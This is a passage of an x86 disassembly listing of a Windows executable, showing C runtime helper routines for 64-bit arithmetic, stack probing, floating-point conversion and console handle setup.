		push	[ebp+arg_0]
		call	sub_411884
		add	esp, 1Ch
		pop	ebp
		retn
sub_41190A	endp


; =============== S U B	R O U T	I N E =======================================



sub_41192B	proc near		; CODE XREF: sub_40FD2B+16p
		push	esi
		push	30000h
		push	10000h
		xor	esi, esi
		push	esi
		call	sub_411EBF
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_411952
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4033CB
		add	esp, 14h

loc_411952:				; CODE XREF: sub_41192B+18j
		pop	esi
		retn
sub_41192B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411954	proc near		; CODE XREF: sub_411990:loc_4119B4j

var_18		= qword	ptr -18h
var_10		= qword	ptr -10h
var_8		= qword	ptr -8

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		fld	ds:dbl_41FE90
		fstp	[ebp+var_10]
		fld	ds:dbl_41FE88
		fstp	[ebp+var_18]
		fld	[ebp+var_18]
		fdiv	[ebp+var_10]
		fmul	[ebp+var_10]
		fsubr	[ebp+var_18]
		fstp	[ebp+var_8]
		fld1
		fcomp	[ebp+var_8]
		fnstsw	ax
		test	ah, 5
		jp	short loc_41198C
		xor	eax, eax
		inc	eax
		leave
		retn
; ---------------------------------------------------------------------------

loc_41198C:				; CODE XREF: sub_411954+31j
		xor	eax, eax
		leave
		retn
sub_411954	endp


; =============== S U B	R O U T	I N E =======================================



sub_411990	proc near		; CODE XREF: sub_40FD2B+5p
		push	offset aKernel32 ; "KERNEL32"
		call	ds:dword_41E0E0	; GetModuleHandleA
		test	eax, eax
		jz	short loc_4119B4
		push	offset aIsprocessorfea ; "IsProcessorFeaturePresent"
		push	eax
		call	ds:off_41E0E8
		test	eax, eax
		jz	short loc_4119B4
		push	0
		call	eax
		retn
; ---------------------------------------------------------------------------

loc_4119B4:				; CODE XREF: sub_411990+Dj
					; sub_411990+1Dj
		jmp	sub_411954
sub_411990	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_4119C0	proc near		; CODE XREF: sub_410A70+11j
					; .text:00410A97j ...
		push	ecx
		lea	ecx, [esp+4]
		sub	ecx, eax
		sbb	eax, eax
		not	eax
		and	ecx, eax
		mov	eax, esp
		and	eax, 0FFFFF000h

loc_4119D4:				; CODE XREF: sub_4119C0+29j
		cmp	ecx, eax
		jb	short loc_4119E2
		mov	eax, ecx
		pop	ecx
		xchg	eax, esp
		mov	eax, [eax]
		mov	[esp+0], eax
		retn
; ---------------------------------------------------------------------------

loc_4119E2:				; CODE XREF: sub_4119C0+16j
		sub	eax, 1000h
		test	[eax], eax
		jmp	short loc_4119D4
sub_4119C0	endp


; =============== S U B	R O U T	I N E =======================================



sub_4119EB	proc near		; CODE XREF: sub_410A9C+24p
		xor	eax, eax
		push	eax
		push	eax
		push	3
		push	eax
		push	3
		push	40000000h
		push	offset aConout	; "CONOUT$"
		call	ds:off_41E06C
		mov	dword_425224, eax
		retn
sub_4119EB	endp


; =============== S U B	R O U T	I N E =======================================



sub_411A0A	proc near		; DATA XREF: jlrllt49:0041E300o
		mov	eax, dword_425224
		cmp	eax, 0FFFFFFFFh
		push	esi
		mov	esi, ds:off_41E0D8
		jz	short loc_411A23
		cmp	eax, 0FFFFFFFEh
		jz	short loc_411A23
		push	eax
		call	esi ; sub_4497E8

loc_411A23:				; CODE XREF: sub_411A0A+Fj
					; sub_411A0A+14j
		mov	eax, dword_425220
		cmp	eax, 0FFFFFFFFh
		jz	short loc_411A35
		cmp	eax, 0FFFFFFFEh
		jz	short loc_411A35
		push	eax
		call	esi ; sub_4497E8

loc_411A35:				; CODE XREF: sub_411A0A+21j
					; sub_411A0A+26j
		pop	esi
		retn
sub_411A0A	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411A40	proc near		; CODE XREF: sub_41126D+102p

arg_0		= dword	ptr  8
arg_4		= byte ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	edi
		mov	edi, [ebp+arg_0]
		xor	eax, eax
		or	ecx, 0FFFFFFFFh
		repne scasb
		add	ecx, 1
		neg	ecx
		sub	edi, 1
		mov	al, [ebp+arg_4]
		std
		repne scasb
		add	edi, 1
		cmp	[edi], al
		jz	short loc_411A67
		xor	eax, eax
		jmp	short loc_411A69
; ---------------------------------------------------------------------------

loc_411A67:				; CODE XREF: sub_411A40+21j
		mov	eax, edi

loc_411A69:				; CODE XREF: sub_411A40+25j
		cld
		pop	edi
		leave
		retn
sub_411A40	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411A6D	proc near		; CODE XREF: sub_410F84+15p

var_28		= byte ptr -28h
var_24		= byte ptr -24h
var_1C		= dword	ptr -1Ch
var_18		= byte ptr -18h
var_14		= dword	ptr -14h
var_10		= byte ptr -10h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 28h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		push	[ebp+arg_8]
		mov	edi, [ebp+arg_4]
		lea	ecx, [ebp+var_24]
		call	sub_402CAD
		lea	eax, [ebp+var_24]
		push	eax
		xor	ebx, ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	edi
		lea	eax, [ebp+var_28]
		push	eax
		lea	eax, [ebp+var_10]
		push	eax
		call	sub_4129AD
		mov	[ebp+var_14], eax
		lea	eax, [ebp+var_10]
		push	esi
		push	eax
		call	sub_411F29
		add	esp, 28h
		test	byte ptr [ebp+var_14], 3
		jnz	short loc_411AEA
		cmp	eax, 1
		jnz	short loc_411AD5

loc_411AC4:				; CODE XREF: sub_411A6D+87j
		cmp	[ebp+var_18], bl
		jz	short loc_411AD0
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411AD0:				; CODE XREF: sub_411A6D+5Aj
		push	3

loc_411AD2:				; CODE XREF: sub_411A6D+7Bj
		pop	eax
		jmp	short loc_411B04
; ---------------------------------------------------------------------------

loc_411AD5:				; CODE XREF: sub_411A6D+55j
		cmp	eax, 2
		jnz	short loc_411AF6

loc_411ADA:				; CODE XREF: sub_411A6D+81j
		cmp	[ebp+var_18], bl
		jz	short loc_411AE6
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411AE6:				; CODE XREF: sub_411A6D+70j
		push	4
		jmp	short loc_411AD2
; ---------------------------------------------------------------------------

loc_411AEA:				; CODE XREF: sub_411A6D+50j
		test	byte ptr [ebp+var_14], 1
		jnz	short loc_411ADA
		test	byte ptr [ebp+var_14], 2
		jnz	short loc_411AC4

loc_411AF6:				; CODE XREF: sub_411A6D+6Bj
		cmp	[ebp+var_18], bl
		jz	short loc_411B02
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411B02:				; CODE XREF: sub_411A6D+8Cj
		xor	eax, eax

loc_411B04:				; CODE XREF: sub_411A6D+66j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_411A6D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411B13	proc near		; CODE XREF: sub_410F84+2Ep

var_28		= byte ptr -28h
var_24		= byte ptr -24h
var_1C		= dword	ptr -1Ch
var_18		= byte ptr -18h
var_14		= dword	ptr -14h
var_10		= byte ptr -10h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 28h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		push	[ebp+arg_8]
		mov	edi, [ebp+arg_4]
		lea	ecx, [ebp+var_24]
		call	sub_402CAD
		lea	eax, [ebp+var_24]
		push	eax
		xor	ebx, ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	edi
		lea	eax, [ebp+var_28]
		push	eax
		lea	eax, [ebp+var_10]
		push	eax
		call	sub_4129AD
		mov	[ebp+var_14], eax
		lea	eax, [ebp+var_10]
		push	esi
		push	eax
		call	sub_41246B
		add	esp, 28h
		test	byte ptr [ebp+var_14], 3
		jnz	short loc_411B90
		cmp	eax, 1
		jnz	short loc_411B7B

loc_411B6A:				; CODE XREF: sub_411B13+87j
		cmp	[ebp+var_18], bl
		jz	short loc_411B76
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411B76:				; CODE XREF: sub_411B13+5Aj
		push	3

loc_411B78:				; CODE XREF: sub_411B13+7Bj
		pop	eax
		jmp	short loc_411BAA
; ---------------------------------------------------------------------------

loc_411B7B:				; CODE XREF: sub_411B13+55j
		cmp	eax, 2
		jnz	short loc_411B9C

loc_411B80:				; CODE XREF: sub_411B13+81j
		cmp	[ebp+var_18], bl
		jz	short loc_411B8C
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411B8C:				; CODE XREF: sub_411B13+70j
		push	4
		jmp	short loc_411B78
; ---------------------------------------------------------------------------

loc_411B90:				; CODE XREF: sub_411B13+50j
		test	byte ptr [ebp+var_14], 1
		jnz	short loc_411B80
		test	byte ptr [ebp+var_14], 2
		jnz	short loc_411B6A

loc_411B9C:				; CODE XREF: sub_411B13+6Bj
		cmp	[ebp+var_18], bl
		jz	short loc_411BA8
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411BA8:				; CODE XREF: sub_411B13+8Cj
		xor	eax, eax

loc_411BAA:				; CODE XREF: sub_411B13+66j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_411B13	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411BB9	proc near		; CODE XREF: sub_411181+96p
					; sub_4116D3+85p ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		mov	ecx, [ebp+arg_C]
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		xor	ebx, ebx
		cmp	esi, ebx
		push	edi
		mov	edi, [ecx+0Ch]
		jnz	short loc_411BEC

loc_411BCE:				; CODE XREF: sub_411BB9+36j
		call	sub_405D93
		push	16h
		pop	esi
		mov	[eax], esi

loc_411BD8:				; CODE XREF: sub_411BB9+59j
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4034C7
		add	esp, 14h
		mov	eax, esi
		jmp	loc_411C71
; ---------------------------------------------------------------------------

loc_411BEC:				; CODE XREF: sub_411BB9+13j
		cmp	[ebp+arg_4], ebx
		jbe	short loc_411BCE
		mov	edx, [ebp+arg_8]
		cmp	edx, ebx
		mov	[esi], bl
		jle	short loc_411BFE
		mov	eax, edx
		jmp	short loc_411C00
; ---------------------------------------------------------------------------

loc_411BFE:				; CODE XREF: sub_411BB9+3Fj
		xor	eax, eax

loc_411C00:				; CODE XREF: sub_411BB9+43j
		inc	eax
		cmp	[ebp+arg_4], eax
		ja	short loc_411C14
		call	sub_405D93
		push	22h
		pop	ecx
		mov	[eax], ecx
		mov	esi, ecx
		jmp	short loc_411BD8
; ---------------------------------------------------------------------------

loc_411C14:				; CODE XREF: sub_411BB9+4Bj
		cmp	edx, ebx
		mov	byte ptr [esi],	30h
		lea	eax, [esi+1]
		jle	short loc_411C38

loc_411C1E:				; CODE XREF: sub_411BB9+7Aj
		mov	cl, [edi]
		cmp	cl, bl
		jz	short loc_411C2A
		movsx	ecx, cl
		inc	edi
		jmp	short loc_411C2D
; ---------------------------------------------------------------------------

loc_411C2A:				; CODE XREF: sub_411BB9+69j
		push	30h
		pop	ecx

loc_411C2D:				; CODE XREF: sub_411BB9+6Fj
		mov	[eax], cl
		inc	eax
		dec	edx
		cmp	edx, ebx
		jg	short loc_411C1E
		mov	ecx, [ebp+arg_C]

loc_411C38:				; CODE XREF: sub_411BB9+63j
		cmp	edx, ebx
		mov	[eax], bl
		jl	short loc_411C50
		cmp	byte ptr [edi],	35h
		jl	short loc_411C50
		jmp	short loc_411C48
; ---------------------------------------------------------------------------

loc_411C45:				; CODE XREF: sub_411BB9+93j
		mov	byte ptr [eax],	30h

loc_411C48:				; CODE XREF: sub_411BB9+8Aj
		dec	eax
		cmp	byte ptr [eax],	39h
		jz	short loc_411C45
		inc	byte ptr [eax]

loc_411C50:				; CODE XREF: sub_411BB9+83j
					; sub_411BB9+88j
		cmp	byte ptr [esi],	31h
		jnz	short loc_411C5A
		inc	dword ptr [ecx+4]
		jmp	short loc_411C6F
; ---------------------------------------------------------------------------

loc_411C5A:				; CODE XREF: sub_411BB9+9Aj
		lea	edi, [esi+1]
		push	edi
		call	sub_4046F0
		inc	eax
		push	eax
		push	edi
		push	esi
		call	sub_407930
		add	esp, 10h

loc_411C6F:				; CODE XREF: sub_411BB9+9Fj
		xor	eax, eax

loc_411C71:				; CODE XREF: sub_411BB9+2Ej
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn
sub_411BB9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411C76	proc near		; CODE XREF: sub_411D31+24p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	edx, [ebp+arg_4]
		movzx	eax, word ptr [edx+6]
		push	ebx
		mov	ecx, eax
		push	esi
		push	edi
		shr	ecx, 4
		and	eax, 8000h
		mov	edi, 7FFh
		and	ecx, edi
		mov	[ebp+arg_4], eax
		mov	eax, [edx+4]
		mov	edx, [edx]
		movzx	ebx, cx
		mov	esi, 80000000h
		and	eax, 0FFFFFh
		test	ebx, ebx
		mov	[ebp+var_4], esi
		jz	short loc_411CC4
		cmp	ebx, edi
		jz	short loc_411CBD
		add	ecx, 3C00h
		jmp	short loc_411CE5
; ---------------------------------------------------------------------------

loc_411CBD:				; CODE XREF: sub_411C76+3Dj
		mov	edi, 7FFFh
		jmp	short loc_411CE8
; ---------------------------------------------------------------------------

loc_411CC4:				; CODE XREF: sub_411C76+39j
		xor	ebx, ebx
		cmp	eax, ebx
		jnz	short loc_411CDC
		cmp	edx, ebx
		jnz	short loc_411CDC
		mov	eax, [ebp+arg_0]
		mov	cx, word ptr [ebp+arg_4]
		mov	[eax+4], ebx
		mov	[eax], ebx
		jmp	short loc_411D28
; ---------------------------------------------------------------------------

loc_411CDC:				; CODE XREF: sub_411C76+52j
					; sub_411C76+56j
		add	ecx, 3C01h
		mov	[ebp+var_4], ebx

loc_411CE5:				; CODE XREF: sub_411C76+45j
		movzx	edi, cx

loc_411CE8:				; CODE XREF: sub_411C76+4Cj
		mov	ecx, edx
		shr	ecx, 15h
		shl	eax, 0Bh
		or	ecx, eax
		or	ecx, [ebp+var_4]
		mov	eax, [ebp+arg_0]
		shl	edx, 0Bh
		test	ecx, esi
		mov	[eax+4], ecx
		mov	[eax], edx
		jnz	short loc_411D23

loc_411D04:				; CODE XREF: sub_411C76+ABj
		mov	ecx, [eax]
		mov	edx, [eax+4]
		mov	ebx, ecx
		add	edx, edx
		shr	ebx, 1Fh
		or	edx, ebx
		add	ecx, ecx
		add	edi, 0FFFFh
		test	edx, esi
		mov	[eax+4], edx
		mov	[eax], ecx
		jz	short loc_411D04

loc_411D23:				; CODE XREF: sub_411C76+8Cj
		mov	ecx, [ebp+arg_4]
		or	ecx, edi

loc_411D28:				; CODE XREF: sub_411C76+64j
		pop	edi
		pop	esi
		mov	[eax+8], cx
		pop	ebx
		leave
		retn
sub_411C76	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411D31	proc near		; CODE XREF: sub_411181+2Ap
					; sub_4116D3+2Ap ...

var_30		= dword	ptr -30h
var_2C		= word ptr -2Ch
var_2A		= byte ptr -2Ah
var_28		= byte ptr -28h
var_10		= byte ptr -10h
var_4		= dword	ptr -4
arg_0		= byte ptr  8
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 30h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_C]
		push	ebx
		mov	ebx, [ebp+arg_8]
		push	esi
		mov	[ebp+var_30], eax
		push	edi
		lea	eax, [ebp+arg_0]
		push	eax
		lea	eax, [ebp+var_10]
		push	eax
		call	sub_411C76
		pop	ecx
		pop	ecx
		lea	eax, [ebp+var_2C]
		push	eax
		push	0
		push	11h
		sub	esp, 0Ch
		lea	esi, [ebp+var_10]
		mov	edi, esp
		movsd
		movsd
		movsw
		call	sub_413071
		mov	esi, [ebp+var_30]
		mov	[ebx+8], eax
		movsx	eax, [ebp+var_2A]
		mov	[ebx], eax
		movsx	eax, [ebp+var_2C]
		mov	[ebx+4], eax
		lea	eax, [ebp+var_28]
		push	eax
		push	[ebp+arg_10]
		push	esi
		call	sub_407C95
		add	esp, 24h
		test	eax, eax
		jz	short loc_411DAB
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	sub_4033CB
		add	esp, 14h

loc_411DAB:				; CODE XREF: sub_411D31+69j
		mov	ecx, [ebp+var_4]
		pop	edi
		mov	[ebx+0Ch], esi
		pop	esi
		mov	eax, ebx
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_411D31	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_411DC0	proc near		; CODE XREF: sub_41126D+2F7p
					; sub_41126D+31Dp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	edi
		push	esi
		push	ebp
		xor	edi, edi
		xor	ebp, ebp
		mov	eax, [esp+0Ch+arg_4]
		or	eax, eax
		jge	short loc_411DE4
		inc	edi
		inc	ebp
		mov	edx, [esp+0Ch+arg_0]
		neg	eax
		neg	edx
		sbb	eax, 0
		mov	[esp+0Ch+arg_4], eax
		mov	[esp+0Ch+arg_0], edx

loc_411DE4:				; CODE XREF: sub_411DC0+Dj
		mov	eax, [esp+0Ch+arg_C]
		or	eax, eax
		jge	short loc_411E00
		inc	edi
		mov	edx, [esp+0Ch+arg_8]
		neg	eax
		neg	edx
		sbb	eax, 0
		mov	[esp+0Ch+arg_C], eax
		mov	[esp+0Ch+arg_8], edx

loc_411E00:				; CODE XREF: sub_411DC0+2Aj
		or	eax, eax
		jnz	short loc_411E2C
		mov	ecx, [esp+0Ch+arg_8]
		mov	eax, [esp+0Ch+arg_4]
		xor	edx, edx
		div	ecx
		mov	ebx, eax
		mov	eax, [esp+0Ch+arg_0]
		div	ecx
		mov	esi, eax
		mov	eax, ebx
		mul	[esp+0Ch+arg_8]
		mov	ecx, eax
		mov	eax, esi
		mul	[esp+0Ch+arg_8]
		add	edx, ecx
		jmp	short loc_411E73
; ---------------------------------------------------------------------------

loc_411E2C:				; CODE XREF: sub_411DC0+42j
		mov	ebx, eax
		mov	ecx, [esp+0Ch+arg_8]
		mov	edx, [esp+0Ch+arg_4]
		mov	eax, [esp+0Ch+arg_0]

loc_411E3A:				; CODE XREF: sub_411DC0+84j
		shr	ebx, 1
		rcr	ecx, 1
		shr	edx, 1
		rcr	eax, 1
		or	ebx, ebx
		jnz	short loc_411E3A
		div	ecx
		mov	esi, eax
		mul	[esp+0Ch+arg_C]
		mov	ecx, eax
		mov	eax, [esp+0Ch+arg_8]
		mul	esi
		add	edx, ecx
		jb	short loc_411E68
		cmp	edx, [esp+0Ch+arg_4]
		ja	short loc_411E68
		jb	short loc_411E71
		cmp	eax, [esp+0Ch+arg_0]
		jbe	short loc_411E71

loc_411E68:				; CODE XREF: sub_411DC0+98j
					; sub_411DC0+9Ej
		dec	esi
		sub	eax, [esp+0Ch+arg_8]
		sbb	edx, [esp+0Ch+arg_C]

loc_411E71:				; CODE XREF: sub_411DC0+A0j
					; sub_411DC0+A6j
		xor	ebx, ebx

loc_411E73:				; CODE XREF: sub_411DC0+6Aj
		sub	eax, [esp+0Ch+arg_0]
		sbb	edx, [esp+0Ch+arg_4]
		dec	ebp
		jns	short loc_411E85
		neg	edx
		neg	eax
		sbb	edx, 0

loc_411E85:				; CODE XREF: sub_411DC0+BCj
		mov	ecx, edx
		mov	edx, ebx
		mov	ebx, ecx
		mov	ecx, eax
		mov	eax, esi
		dec	edi
		jnz	short loc_411E99
		neg	edx
		neg	eax
		sbb	edx, 0

loc_411E99:				; CODE XREF: sub_411DC0+D0j
		pop	ebp
		pop	esi
		pop	edi
		retn	10h
sub_411DC0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_411EA0	proc near		; CODE XREF: sub_41126D+1EAp
					; sub_41126D+23Ep ...
		cmp	cl, 40h
		jnb	short loc_411EBA
		cmp	cl, 20h
		jnb	short loc_411EB0
		shrd	eax, edx, cl
		shr	edx, cl
		retn
; ---------------------------------------------------------------------------

loc_411EB0:				; CODE XREF: sub_411EA0+8j
		mov	eax, edx
		xor	edx, edx
		and	cl, 1Fh
		shr	eax, cl
		retn
; ---------------------------------------------------------------------------

loc_411EBA:				; CODE XREF: sub_411EA0+3j
		xor	eax, eax
		xor	edx, edx
		retn
sub_411EA0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411EBF	proc near		; CODE XREF: sub_41192B+Ep

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_8]
		mov	ecx, [ebp+arg_4]
		and	eax, 0FFF7FFFFh
		and	ecx, eax
		test	ecx, 0FCF0FCE0h
		push	esi
		jz	short loc_411F09
		push	edi
		mov	edi, [ebp+arg_0]
		xor	esi, esi
		cmp	edi, esi
		jz	short loc_411EED
		push	esi
		push	esi
		call	sub_413A67
		pop	ecx
		pop	ecx
		mov	[edi], eax

loc_411EED:				; CODE XREF: sub_411EBF+21j
		call	sub_405D93
		push	16h
		pop	edi
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	[eax], edi
		call	sub_4034C7
		add	esp, 14h
		mov	eax, edi
		pop	edi
		jmp	short loc_411F26
; ---------------------------------------------------------------------------

loc_411F09:				; CODE XREF: sub_411EBF+17j
		mov	esi, [ebp+arg_0]
		test	esi, esi
		push	eax
		push	[ebp+arg_4]
		jz	short loc_411F1D
		call	sub_413A67
		mov	[esi], eax
		jmp	short loc_411F22
; ---------------------------------------------------------------------------

loc_411F1D:				; CODE XREF: sub_411EBF+53j
		call	sub_413A67

loc_411F22:				; CODE XREF: sub_411EBF+5Cj
		pop	ecx
		pop	ecx
		xor	eax, eax

loc_411F26:				; CODE XREF: sub_411EBF+48j
		pop	esi
		pop	ebp
		retn
sub_411EBF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411F29	proc near		; CODE XREF: sub_411A6D+44p

var_2C		= byte ptr -2Ch
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	eax, [ebp+arg_0]
		movzx	ecx, word ptr [eax+0Ah]
		push	ebx
		mov	ebx, ecx
		and	ecx, 8000h
		mov	[ebp+var_14], ecx
		mov	ecx, [eax+6]
		mov	[ebp+var_20], ecx
		mov	ecx, [eax+2]
		movzx	eax, word ptr [eax]
		and	ebx, 7FFFh
		sub	ebx, 3FFFh
		shl	eax, 10h
		cmp	ebx, 0FFFFC001h
		push	edi
		mov	[ebp+var_1C], ecx
		mov	[ebp+var_18], eax
		jnz	short loc_411F93
		xor	ebx, ebx
		xor	eax, eax

loc_411F70:				; CODE XREF: sub_411F29+51j
		cmp	[ebp+eax*4+var_20], ebx
		jnz	short loc_411F83
		inc	eax
		cmp	eax, 3
		jl	short loc_411F70
		xor	eax, eax
		jmp	loc_412428
; ---------------------------------------------------------------------------

loc_411F83:				; CODE XREF: sub_411F29+4Bj
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		push	2
		stosd
		pop	eax
		jmp	loc_412428
; ---------------------------------------------------------------------------

loc_411F93:				; CODE XREF: sub_411F29+41j
		and	[ebp+arg_0], 0
		push	esi
		lea	esi, [ebp+var_20]
		lea	edi, [ebp+var_2C]
		movsd
		movsd
		movsd
		mov	esi, dword_425238
		dec	esi
		lea	ecx, [esi+1]
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		sar	eax, 5
		mov	edx, ecx
		and	edx, 8000001Fh
		mov	[ebp+var_10], ebx
		mov	[ebp+var_C], eax
		jns	short loc_411FCB
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_411FCB:				; CODE XREF: sub_411F29+9Bj
		lea	edi, [ebp+eax*4+var_20]
		push	1Fh
		xor	eax, eax
		pop	ecx
		sub	ecx, edx
		inc	eax
		shl	eax, cl
		mov	[ebp+var_8], ecx
		test	[edi], eax
		jz	loc_412071
		mov	eax, [ebp+var_C]
		or	edx, 0FFFFFFFFh
		shl	edx, cl
		not	edx
		test	[ebp+eax*4+var_20], edx
		jmp	short loc_411FF9
; ---------------------------------------------------------------------------

loc_411FF4:				; CODE XREF: sub_411F29+D6j
		cmp	[ebp+eax*4+var_20], 0

loc_411FF9:				; CODE XREF: sub_411F29+C9j
		jnz	short loc_412003
		inc	eax
		cmp	eax, 3
		jl	short loc_411FF4
		jmp	short loc_412071
; ---------------------------------------------------------------------------

loc_412003:				; CODE XREF: sub_411F29:loc_411FF9j
		mov	eax, esi
		cdq
		push	1Fh
		pop	ecx
		and	edx, ecx
		add	eax, edx
		sar	eax, 5
		and	esi, 8000001Fh
		jns	short loc_41201D
		dec	esi
		or	esi, 0FFFFFFE0h
		inc	esi

loc_41201D:				; CODE XREF: sub_411F29+EDj
		and	[ebp+var_4], 0
		sub	ecx, esi
		xor	edx, edx
		inc	edx
		shl	edx, cl
		lea	ecx, [ebp+eax*4+var_20]
		mov	esi, [ecx]
		add	esi, edx
		mov	[ebp+arg_0], esi
		mov	esi, [ecx]
		cmp	[ebp+arg_0], esi
		jb	short loc_41205C
		cmp	[ebp+arg_0], edx
		jmp	short loc_41205A
; ---------------------------------------------------------------------------

loc_41203F:				; CODE XREF: sub_411F29+143j
		test	ecx, ecx
		jz	short loc_41206E
		and	[ebp+var_4], 0
		lea	ecx, [ebp+eax*4+var_20]
		mov	edx, [ecx]
		lea	esi, [edx+1]
		cmp	esi, edx
		mov	[ebp+arg_0], esi
		jb	short loc_41205C
		cmp	esi, 1

loc_41205A:				; CODE XREF: sub_411F29+114j
		jnb	short loc_412063

loc_41205C:				; CODE XREF: sub_411F29+10Fj
					; sub_411F29+12Cj
		mov	[ebp+var_4], 1

loc_412063:				; CODE XREF: sub_411F29:loc_41205Aj
		dec	eax
		mov	edx, [ebp+arg_0]
		mov	[ecx], edx
		mov	ecx, [ebp+var_4]
		jns	short loc_41203F

loc_41206E:				; CODE XREF: sub_411F29+118j
		mov	[ebp+arg_0], ecx

loc_412071:				; CODE XREF: sub_411F29+B5j
					; sub_411F29+D8j
		mov	ecx, [ebp+var_8]
		or	eax, 0FFFFFFFFh
		shl	eax, cl
		and	[edi], eax
		mov	eax, [ebp+var_C]
		inc	eax
		cmp	eax, 3
		jge	short loc_412091
		push	3
		pop	ecx
		lea	edi, [ebp+eax*4+var_20]
		sub	ecx, eax
		xor	eax, eax
		rep stosd

loc_412091:				; CODE XREF: sub_411F29+159j
		cmp	[ebp+arg_0], 0
		jz	short loc_412098
		inc	ebx

loc_412098:				; CODE XREF: sub_411F29+16Cj
		mov	eax, dword_425234
		mov	ecx, eax
		sub	ecx, dword_425238
		cmp	ebx, ecx
		jge	short loc_4120B6
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		stosd
		jmp	loc_4122C3
; ---------------------------------------------------------------------------

loc_4120B6:				; CODE XREF: sub_411F29+17Ej
		cmp	ebx, eax
		jg	loc_4122CD
		sub	eax, [ebp+var_10]
		lea	esi, [ebp+var_2C]
		mov	ecx, eax
		lea	edi, [ebp+var_20]
		movsd
		cdq
		and	edx, 1Fh
		add	eax, edx
		movsd
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		movsd
		jns	short loc_4120E4
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_4120E4:				; CODE XREF: sub_411F29+1B4j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	edi, 0FFFFFFFFh
		mov	ecx, edx
		shl	edi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	edi

loc_4120FF:				; CODE XREF: sub_411F29+201j
		mov	ebx, [ebp+arg_0]
		lea	ebx, [ebp+ebx*4+var_20]
		mov	esi, [ebx]
		mov	ecx, esi
		and	ecx, edi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	esi, cl
